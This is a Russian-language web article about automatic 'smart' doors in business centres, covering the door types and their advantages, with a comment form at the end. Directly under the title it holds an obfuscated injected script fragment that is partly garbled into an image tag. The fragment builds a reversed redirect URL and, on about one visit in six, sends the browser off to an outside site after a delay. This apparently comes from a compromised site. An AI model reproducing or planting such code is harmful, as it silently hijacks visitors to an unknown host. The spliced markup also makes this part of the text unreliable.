Добавить в закладки

Для чего нужны «умные двери» в бизнес-центрах?

tobor-latigid//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tomat8-mini.jpg» alt=»» width=»600″ height=»400″ />

 

Бизнес-центры – это неотъемлемая и важная часть жизни любого города и центры деловой активности людей, занимающихся предпринимательской деятельностью. Бизнес-центр стал новым типом общественного здания представляющий из себя многофункциональную структуру, которая обеспечивает различные потребности общества. Здание полностью оборудовано для ведения деловой деятельности, а доступ в здание обеспечивают автоматические двери или «SMART».

Почему в бизнес центрах устанавливают умные двери?

Автоматические модели в бизнес центре – это необходимое условие для обеспечения быстрого перемещения большого количества людей, а также, что немаловажно, подтверждение статусности объекта. Ведь с вида и особенностей функционирования складывается первое впечатление у посетителей о всем здании. В бизнес центрах чаще всего устанавливают следующие виды дверей, которые обеспечивают высокую пропускную способность.

  • Раздвижные – наиболее распространенный вариант оформления проема в бизнес-центрах. При таком варианте открытия створки сдвигаются в стороны.
  • Распашные маятниковые. При данном типе открытия створки распахиваются вперед или назад.
  • Карусельные (револьверные) модели. Полотно закреплено на подвижной оси и может вращаться на 360°.

В чем преимущества данных моделей?

Главными требованиями в любое общественное здание являются: она должна обеспечивать рациональное и быстрое перемещение людей, а также быть абсолютно безопасной при эксплуатации.

Достоинства:

  • Возможность движения большого потока людей в течение длительного времени.
  • Комфорт посетителей, ведь для открытия двери достаточно просто к ней подойти.
  • Безопасность при эксплуатации.
  • Хорошие показатели теплосбережения. Модели имеют автоматическую систему захлопывания, а также створки плотно прилегают, поэтому потери тепла незначительные. Дополнительно над дверью или сбоку устанавливаются тепловые вентиляторы, которые подают теплый воздух в тамбур.
  • Надежность и длительный срок эксплуатации. Автоматическая система открывает и закрывает дверь аккуратно и медленно, исключая резкие открытие и сильное захлопывание, что увеличивает срок службы. Автоматическая дверь двигается строго по указанной траектории не отклоняясь под действием внешних сил, что нередко происходит при ручном открытии дверей.
  • Универсальность использования. SMART двери можно устанавливать в зданиях любого назначения в проем любой ширины.
  • Автоматические настройки режима работы. Программируемые настройки позволяют устанавливать несколько режимов эксплуатации.
  • Автоматическая дверь дополнительно может оснащаться цифровыми устройствами и подключаться к системам управления зданием.

SMART двери в бизнес-центрах обеспечивают необходимый уровень безопасности движения людей, и при этом выглядят дорого, стильно и престижно.

Добавить в избранное Версия для печати
Поделитесь:
Рейтинг статьи:
Автор: admin
Опубликовано: 11.07.2021





Оставить комментарий

ОБЯЗАТЕЛЬНО приложите ФОТО проблемы - так ответ эксперта будет гораздо точней

Оставляя комментарий, Вы принимаете пользовательское соглашение

Ваше имя:
Ваш e-mail: